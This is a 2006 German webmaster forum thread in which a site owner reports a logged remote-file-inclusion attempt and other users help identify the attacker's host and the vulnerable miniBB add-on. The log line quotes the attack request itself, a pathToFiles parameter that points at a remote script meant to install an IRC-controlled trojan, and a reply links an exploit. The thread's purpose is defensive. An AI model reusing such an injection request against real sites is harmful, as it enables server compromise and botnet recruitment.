ABAKUS

Verfasst: **17.10.2006, 18:20**

IP: 217.160.230.167
Aufruf: ~/addon_keywordreplacer.php?pathToFiles=https://www.yagenoysentoplesen.com/spread.txt?
Aufenthaltsort gekürzt, und durch ~ ersetzt.

Agent: libwww-perl/5.64

Inhalt der spread.txt
/* CUT */

Was würdet Ihr davon halten? Jemand dies schonmal gesehen?
Ich gehe mal ganz stark von einem Hijacking versuch aus.
Allein das versucht wird auf /tmp und wget zuzugreifen lässt mich nicht gutes erahnen.

// EDIT
hab den Abschnitt oben entfernt. Zu gefärhlich.

Verfasst: **17.10.2006, 18:55**

Hast du bei Schlund und Partner gehostet?

Code: Alles auswählen

Suchbegriff&#58; 217.160.230.167
Adresse&#58; whois.ripe.net

Suchergebnis&#58;
% This is the RIPE Whois query server #2.
% The objects are in RPSL format.
%
% Note&#58; the default output of the RIPE Whois server
% is changed. Your tools may need to be adjusted. See
% http&#58;//www.ripe.net/db/news/abuse-proposal-20050331.html
% for more details.
%
% Rights restricted by copyright.
% See http&#58;//www.ripe.net/db/copyright.html

% Note&#58; This output has been filtered.
%       To receive output for a database update, use the "-B" flag

% Information related to '217.160.224.0 - 217.160.239.255'

inetnum&#58;      217.160.224.0 - 217.160.239.255
netname&#58;      SCHLUND-CUSTOMERS
descr&#58;        Schlund + Partner AG
country&#58;      US
admin-c&#58;      UI-RIPE
tech-c&#58;       UI-RIPE
remarks&#58;      INFRA-AW
remarks&#58;      in case of abuse or spam, please mailto&#58; abuse@schlund.de
status&#58;       ASSIGNED PA
mnt-by&#58;       SCHLUND-MNT
source&#58;       RIPE # Filtered

role&#58;         Schlund NCC
address&#58;      Schlund + Partner AG
address&#58;      Brauerstrasse 48
address&#58;      D-76135 Karlsruhe
address&#58;      Germany
remarks&#58;      For abuse issues, please use only abuse@schlund.com
remarks&#58;      For NOC issues, please look at our AS 8560
phone&#58;        +49 721 91374 50
fax-no&#58;       +49 721 91374 20
e-mail&#58;       abuse@schlund.com
admin-c&#58;      SPNC-RIPE
tech-c&#58;       SPNC-RIPE
nic-hdl&#58;      UI-RIPE
mnt-by&#58;       SCHLUND-MNT
source&#58;       RIPE # Filtered

% Information related to '217.160.224.0/19AS8560'

route&#58;        217.160.224.0/19
descr&#58;        SCHLUND-USA-1
origin&#58;       AS8560
mnt-by&#58;       SCHLUND-MNT
source&#58;       RIPE # Filtered

Verfasst: **17.10.2006, 19:00**

Schau dir doch mal das da an:
https://www.yagenoysentoplesen.com/al

Man versucht dir einfach ein Progrämmle unterzuschieben, das dich dann im IRC als infiziertes System bekannt gibt.

SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002

persönliche Betreuung
individuelle Beratung
kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.

Verfasst: **17.10.2006, 19:03**

Ach ja, der Angriff geht von einem bei Schlund stehenden infizierten Server aus.

Sende eine Mail an abuse@schlund.com, schildere den Fall, schick denen einen entsprechenden Logauszug mit und behalte dir rechtliche Schritte vor, falls die Angriffe auf deinen Server nicht unterbunden werden.

Verfasst: **17.10.2006, 19:09**

miniBB keyword_replacer <= 1.0 [pathToFiles] Remote File Include Vulnerability

https://www.milw0rm.com/exploits/download/2528
(.TXT Datei download)

Verfasst: **17.10.2006, 19:10**

Hallo,

vielen Dank. Ich konnte zwischenzeitlich in erfahrung bringen, dass man versucht hat mir einen TRojaner unterzujubeln.
Mit dessen Hilfe man DOS-Attacken, Portscans, UDP-Floods, HTTP-Floods utc. ausführen lassen kann.

Schlund sowie der Provider der Domain bekommen Post von mir.
Inhaber der Domain ein Türke. Landesvorwahl +90

Ich kann das zwar bei den entsprechenden Providern anzeigen, jedoch denke ich das ich nur das Symptom entferne, nicht jedoch die ursache.

Ich muss mal schauen, wie ich das unterbinden kann.
Kaum steigt der PR und die Positionen Rutschen nach oben, kommen auch solche Dummköpfe auf einen zu

Verfasst: **17.10.2006, 19:13**

net(t)worker hat geschrieben:
miniBB keyword_replacer <= 1.0 [pathToFiles] Remote File Include Vulnerability
https://www.milw0rm.com/exploits/download/2528
(.TXT Datei download)

Danke, genau das habe ich vermutet. Ich besitze zwar keine Datei mit diesem namen, werde aber die Tore was das angeht ganz Schließen.

Mir echt zu Dumm mit den Spinnern.

Verfasst: **17.10.2006, 19:27**

solange du kein miniBB bei dir drauf hast, kann dir auch nix passieren bei diesem Angriff... Ich habe täglich mehrere solcher Angriffsversuche bei meinem Server, nicht speziell diese Art, sondern breit gestreut...... und auch täglich 10 - 20 Versuche ob mein Mailserver als relay genutzt werden kann...

ist also ganz normaler Alltag eines Serveradmins...

Verfasst: **17.10.2006, 19:31**

netWorker, ich möchte dich Bitten das wir ggf. bzgl. Thema Sicherheits ma miteinander Sprechen.

Ich will nur sicherstellen, dass bei mir auch alles i.o. ist

Zwar weis ich ja schon so einiges, aber gibt bestimmt sachen, vorallem in Bezug auf Mail Server, die ich noch nicht weis.

Ich habe auch eben bei Schlund & Partner Angerufen.
Die sache nimmt nun seinen Lauf.

Grüße

Verfasst: **17.10.2006, 20:08**

Mailserver ISP Style:
https://workaround.org/articles/ispmail-sarge/

nach der Anleitung habe ich meinen Mailserver aufgesetzt..... und bin sehr zufrieden damit, der Vorteil ist, dass ich keine lokalen User anlegen muss, wenn ich einen Mailaccount einrichten möchte...

in den mail logfiles kann man jeweils sehen, dass wieder jemand versucht hatte den Mailserver als relay zu nutzen, und die Mail abgelehnt wurde....

Als Webserver kommt der Apache2 zum Einsatz mit PHP als fastCGI, selber kompiliert...

falls es dich interessiert was alles bei deinem Server versucht wird, kann ich dir snort in Kombination mit BASE empfehlen.... https://zentralschweiz.lugs.ch/treff-20 ... lation.pdf
Erfordert aber auch schon wieder ein wenig Fachwissen um zu erkennen ob ein Alarm richtig war oder ob es ein falschalarm war.... z.B. bekomme ich täglich eine portscanwarnung für mich selber, da ich auf 3 Ports (80,25,110) zugreife, also Webserver, Mails senden und Mails abrufen....

achja... wie administrierst du deinen Server? Plesk? Confixx? ssh?
ich machs rein über ssh....

Verfasst: **17.10.2006, 20:28**

net(t)worker hat geschrieben: achja... wie administrierst du deinen Server? Plesk? Confixx? ssh?
ich machs rein über ssh....

Größtenteils über SSH, ansonsten gibts Webmin, dies nutze ich jedoch nur, um mir bspw. mails die nicht versand wurden, anzuschauen.
Dummerweise Packt der Server diese nämlich in eine Datei, was die sache recht unübersichtlich macht.

Die Links werde ich mir mal anschauen, jedoch muss ich die 150MB Große Logdatei Auswerten

Der Spinner hat bestimmt 100 verschiedene IPs benutzt. Unglaublich.

Grüße

ABAKUS

Kennt wer diese IP?

Kennt wer diese IP?